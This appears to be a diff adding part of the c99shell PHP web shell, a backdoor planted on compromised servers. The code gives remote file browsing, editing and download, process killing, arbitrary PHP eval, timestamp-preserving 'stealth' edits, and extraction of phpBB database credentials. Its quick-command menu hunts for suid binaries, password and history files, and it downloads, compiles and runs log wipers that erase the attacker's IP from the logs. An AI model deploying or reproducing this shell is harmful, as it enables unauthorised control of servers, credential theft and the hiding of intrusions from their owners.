+ $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + else + { + $type = "DIR"; + $row[] = "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "<a 
href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; + if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} + else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." 
folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"> + <script> + function ls_setcheckboxall(status) + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = status; + id++; + } + } + function ls_reverse_all() + { + var id = 1; + var num = ".(count($table)-2)."; + while (id <= num) + { + document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; + id++; + } + } + </script> + <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> + <b>"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=act><option value=\"".$act."\">With selected:</option>"; + echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; + echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; + if ($usefsbuff) + { + echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; + echo "<option value=copy".($dspact == "copy"?" 
selected":"").">Copy</option>"; + echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; + } + echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; + echo "</form>"; + } +} + +if ($act == "processes") +{ + echo "<b>Processes:</b><br>"; + if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... 
"; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) +{ + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} + $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + $prcs[] = $line; + echo "</tr>"; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + while (ereg("",$ret)) {$ret = str_replace("","",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode("",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";} + else {$y = "<a 
href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i<count($head);$i++) + { + if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode("",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo "</tr>"; + } + } + } + $head[$k] = "<b>".$head[$k]."</b>".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + foreach($tab as $i=>$k) + { + echo "<tr>"; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} + echo "</tr>"; + } + echo "</table>"; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret."<br>";} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if 
(empty($eval_txt)) {$eval_txt = TRUE;}} + echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("[hex]","info"), + array("[html]","html"), + array("[txt]","txt"), + array("[Code]","code"), + array("[Session]","phpsess"), + array("[exe]","exe"), + array("[SDB]","sdb"), + array("[gif]","img"), + array("[ini]","ini"), + array("[download]","download"), + array("[rtf]","notepad"), + array("[change]","edit") + ); + echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;[$ext]&nbsp;".$f." 
(".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} + elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} + else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} + echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; + } + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { + echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} + else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000<br>"; + $a1 = ""; + $a2 = ""; + for ($i=0; $i<strlen($str); $i++) + { + $a1 .= 
sprintf("%02X",ord($str[$i]))." "; + switch (ord($str[$i])) + { + case 0: $a2 .= "<font>0</font>"; break; + case 32: + case 10: + case 13: $a2 .= "&nbsp;"; break; + default: $a2 .= htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { + $n = 0; + if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} + $a1 .= "<br>"; + $a2 .= "<br>"; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; + } + $encoded = ""; + if ($base64 == 1) + { + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "<b>Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "</b><br>"; + } + if (!empty($encoded)) + { + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; + } + echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a 
href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} + elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} + elseif ($ft == "phpsess") + { + echo "<pre>"; + $v = explode("|",$r); + echo $v[0]."<br>"; + var_dump(unserialize($v[1])); + echo "</pre>"; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; + } + elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo 
"But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + echo "</b><hr size=\"1\" noshade>"; + } + } + echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "</div>"; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "<center><b>Size:</b>&nbsp;"; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; + if ($imgsize != $v ) {echo $v;} + else {echo "<u>".$v."</u>";} + echo "</a>&nbsp;&nbsp;&nbsp;"; + } + echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") 
+ { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>Saved!</b>"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +} +else +{ + @ob_clean(); + //For simple size- and speed-optimization. 
+ $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! 
Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top"><center><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><br/><b>Local Command:</b> <input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center"><br/> + <b> Quick Commands </b></div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="#"> [File Manipulation] + <OPTION VALUE=""> + <OPTION VALUE="lsattr -va">List file attributes on a Linux second extended file system + <OPTION VALUE="find / -type f -perm -04000 -ls">Find suid files + <OPTION VALUE="find . -type f -perm -04000 -ls">Find suid files in current directory + <OPTION VALUE="find / -type f -perm -02000 -ls">Find sgid files + <OPTION VALUE="find . -type f -perm -02000 -ls">Find sgid files in current directory + <OPTION VALUE="ls -lia">List you current directory's files, folders, & permissions + <OPTION VALUE="find / -type f -name config.inc.php">Find config.inc.php files + <OPTION VALUE="find . 
-type f -name config.inc.php">Find config.inc.php files in current directory + <OPTION VALUE="find / -type f -name "config*">Find config* files + <OPTION VALUE="find . -type f -name "config*">Find config* files in current directory + <OPTION VALUE="find / -type f -perm -2 -ls">Find all writable files + <OPTION VALUE="find . -type f -perm -2 -ls">Find all writable files in current directory + <OPTION VALUE="find / -perm -2 -ls">Find all writable directories and files + <OPTION VALUE="find . -perm -2 -ls">Find all writable directories and files in current directory + <OPTION VALUE="find / -type f -name service.pwd">Find all service.pwd files + <OPTION VALUE="find . -type f -name service.pwd">Find service.pwd files in current directory + <OPTION VALUE="find / -type f -name .htpasswd">Find all .htpasswd files + <OPTION VALUE="find . -type f -name .htpasswd">Find .htpasswd files in current directory + <OPTION VALUE="find / -type f -name .bash_history">Find all .bash_history files + <OPTION VALUE="find . -type f -name .bash_history">Find .bash_history files in current directory + <OPTION VALUE="find / -type f -name .mysql_history">Find all .mysql_history files + <OPTION VALUE="find . -type f -name .mysql_history">Find .mysql_history files in current directory + <OPTION VALUE="find / -type f -name .fetchmailrc">Find all .fetchmailrc files + <OPTION VALUE="find . -type f -name .fetchmailrc">Find .fetchmailrc files in current directory + <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs + <OPTION VALUE=""> + <OPTION VALUE="#"> [Directory Malipulation] + <OPTION VALUE=""> + <OPTION VALUE="pwd">List your current directory + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Is /etc/ writable? + <OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . 
-type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE="find / -type d -perm -2 -ls">Find all writable directories +<OPTION VALUE="find . -type d -perm -2 -ls">Find all writable directories in current directory +<OPTION VALUE=""> +<OPTION VALUE="#"> [Miscellaneous Commands] +<OPTION VALUE=""> + <OPTION VALUE="tar -cvf NEWTAR!!.tar -c <?php passthru('pwd'); ?>">Tar your current directory. (Only works if the directory is writable) + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last users to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">Users without passwords + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CpuInfo + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE=""> + <OPTION VALUE="#"> [Application Verification] + <OPTION VALUE=""> + <OPTION VALUE="which wget curl w3m lynx">Check For Downloaders (WGET, et cetera) + <OPTION VALUE="locate gcc">Check For GCC + <OPTION VALUE=""> + <OPTION VALUE="#"> [Log Cleaners] + <OPTION VALUE=""> + <OPTION VALUE="wget http://packetstormsecurity.org/UNIX/penetration/log-wipers/logcleaner-0.3.c">Wipelogs (Part 1)(Zap3) + <OPTION VALUE="gcc logcleaner-0.3.c -o logcleaner-0.3">Wipelogs (Part 2)(Zap3) + <OPTION VALUE="./logcleaner-0.3 <? echo $_SERVER["REMOTE_ADDR"]; ?>">Wipelogs (Part 3)(Zap3) + <OPTION VALUE="Gone!<? if($_REQUEST['cmd']=="Gone!") { if (file_exists("logcleaner-0.3.c")) { unlink("logcleaner-0.3.c"); } if (file_exists("logcleaner-0.3")) { unlink("logcleaner-0.3"); } } ?>">Remove All Zap3 Traces + <OPTION VALUE=""> + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/vanish.c">Wipelogs (Part 1)(Vanish) + <OPTION VALUE="gcc vanish.c -o vanish">Wipelogs (Part 2)(Vanish) + <OPTION VALUE="./vanish <? echo exec('whoami'); ?> <? 
